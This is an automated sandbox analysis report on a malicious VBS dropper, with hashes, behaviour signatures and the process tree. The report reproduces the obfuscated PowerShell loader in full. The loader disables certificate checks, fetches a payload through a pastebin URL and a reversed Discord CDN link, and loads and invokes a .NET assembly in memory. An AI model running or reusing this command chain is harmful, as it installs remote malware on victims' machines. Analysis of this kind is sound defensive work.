Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
18-10-2024 01:46
General
-
Target
201f42fefc3fe9ccb91d681c146f9b71.vbs
-
Size
6.2MB
-
MD5
201f42fefc3fe9ccb91d681c146f9b71
-
SHA1
bff72444888b11c5b5d03eb407af7d2f88b49960
-
SHA256
b026259f2b7111c2f22846579fee6daf50b10a983eaa91d4e1f93c65d4887348
-
SHA512
9dc8d1a9ec32b3b54220f644ec85f173d98df1e16247e1f23556f348e546deebba7924cd2c7ddb692bfc39dd8dacbc84118287f8d94282192c91558c3726169d
-
SSDEEP
384:+555X555X555X555W555X555X555X555n555X555X555X555W555X555X555X55P:Y
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://pastebin.com/raw/J6uRjZrv
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\201f42fefc3fe9ccb91d681c146f9b71.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B5☆HY☆bQB5☆HM☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆GE☆egBk☆G4☆ag☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBy☆HY☆ZQBy☆EM☆ZQBy☆HQ☆aQBm☆Gk☆YwBh☆HQ☆ZQBW☆GE☆b☆Bp☆GQ☆YQB0☆Gk☆bwBu☆EM☆YQBs☆Gw☆YgBh☆GM☆aw☆g☆D0☆I☆B7☆CQ☆d☆By☆HU☆ZQB9☆Ds☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆HI☆dgBp☆GM☆ZQBQ☆G8☆aQBu☆HQ☆TQBh☆G4☆YQBn☆GU☆cgBd☆Do☆OgBT☆GU☆YwB1☆HI☆aQB0☆Hk☆U☆By☆G8☆d☆Bv☆GM☆bwBs☆C☆☆PQ☆g☆Fs☆UwB5☆HM☆d☆Bl☆G0☆LgBO☆GU☆d☆☆u☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆V☆B5☆H☆☆ZQBd☆Do☆OgBU☆Gw☆cw☆x☆DI☆OwBb☆EI☆eQB0☆GU☆WwBd☆F0☆I☆☆k☆GM☆agBl☆Gg☆dg☆g☆D0☆I☆Bb☆HM☆eQBz☆HQ☆ZQBt☆C4☆QwBv☆G4☆dgBl☆HI☆d☆Bd☆Do☆OgBG☆HI☆bwBt☆EI☆YQBz☆GU☆Ng☆0☆FM☆d☆By☆Gk☆bgBn☆Cg☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBK☆DY☆dQBS☆Go☆WgBy☆HY☆Jw☆p☆C☆☆KQ☆g☆Ck☆OwBb☆HM☆eQBz☆HQ☆ZQBt☆C4☆QQBw☆H☆☆R☆Bv☆G0☆YQBp☆G4☆XQ☆6☆Do☆QwB1☆HI☆cgBl☆G4☆d☆BE☆G8☆bQBh☆Gk☆bg☆u☆Ew☆bwBh☆GQ☆K☆☆k☆GM☆agBl☆Gg☆dg☆p☆C4☆RwBl☆HQ☆V☆B5☆H☆☆ZQ☆o☆Cc☆V☆Bl☆Gg☆dQBs☆GM☆a☆Bl☆HM☆W☆B4☆Fg☆e☆B4☆C4☆QwBs☆GE☆cwBz☆DE☆Jw☆p☆C4☆RwBl☆HQ☆TQBl☆HQ☆a☆Bv☆GQ☆K☆☆n☆E0☆cwBx☆EI☆SQBi☆Fk☆Jw☆p☆C4☆SQBu☆HY☆bwBr☆GU☆K☆☆k☆G4☆dQBs☆Gw☆L☆☆g☆Fs☆bwBi☆Go☆ZQBj☆HQ☆WwBd☆F0☆I☆☆o☆Cc☆Jg☆5☆GI☆Z☆Bi☆DQ☆NgBl☆DM☆M☆Bk☆GQ☆YwBh☆DM☆Z☆☆4☆DI☆N☆☆5☆Dc☆MQBl☆GM☆Yw☆x☆GU☆YgBm☆GY☆Yw☆4☆DY☆Zg☆5☆DU☆Mg☆y☆DI☆N☆☆1☆GI☆M☆☆z☆GI☆Yg☆0☆DQ☆Mg☆0☆DQ☆Mw☆y☆DM☆M☆☆z☆D☆☆NQBh☆D☆☆N☆Bi☆Dk☆ZQ☆z☆D0☆bQBo☆CY☆Nw☆5☆DI☆NQ☆x☆DE☆Nw☆2☆D0☆cwBp☆CY☆Nw☆x☆DQ☆YQ☆y☆DE☆Nw☆2☆D0☆e☆Bl☆D8☆d☆B4☆HQ☆Lg☆w☆DE☆Nw☆x☆HY☆bgBF☆C8☆MQ☆x☆D☆☆Mw☆z☆DQ☆Nw☆4☆DE☆Ng☆5☆DI☆NQ☆z☆DU☆Ng☆5☆DI☆MQ☆v☆DY☆MQ☆4☆DM☆M☆☆x☆Dk☆MQ☆4☆Dg☆Mg☆4☆DQ☆Ng☆z☆DU☆MQ☆y☆DE☆LwBz☆HQ☆bgBl☆G0☆a☆Bj☆GE☆d☆B0☆GE☆LwBt☆G8☆Yw☆u☆H☆☆c☆Bh☆GQ☆cgBv☆GM☆cwBp☆GQ☆LgBu☆GQ☆Yw☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆GE☆egBk☆G4☆ag☆g☆Cw☆I☆☆n☆F8☆XwBf☆F8☆XwB5☆Gg☆YQB0☆HM☆cgBk☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆B5☆HY☆bQB5☆HM☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\201f42fefc3fe9ccb91d681c146f9b71.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$yvmys = '0';$azdnj = 'C:\Users\Admin\AppData\Local\Temp\201f42fefc3fe9ccb91d681c146f9b71.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $cjehv = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/J6uRjZrv') ) );[system.AppDomain]::CurrentDomain.Load($cjehv).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&9bdb46e30ddca3d824971ecc1ebffc86f9522245b03bb442443230305a04b9e3=mh&79251176=si&714a2176=xe?txt.0171vnE/1103347816925356921/6183019188284635121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $azdnj , '_____yhatsrd_______________________________________-------', $yvmys, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5ee449b2e0b6b4c9f7b7a2f165612a6cd
SHA162fe7e57be4c1f41a7f2e4079732c373fd9c5bc8
SHA256073ba7f7d8783310a2c9b37adcad7afa96d4ba3829dd27eeeb39bb364f600c12
SHA512c04d865aa841b9d00b6d12892d7ccba3ce18b99d4261fe0539171270aa18e6de16ac4d48496b6075364e493447dd4bd3594d5b0109dbee73c9e5724fb2b91a0d
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB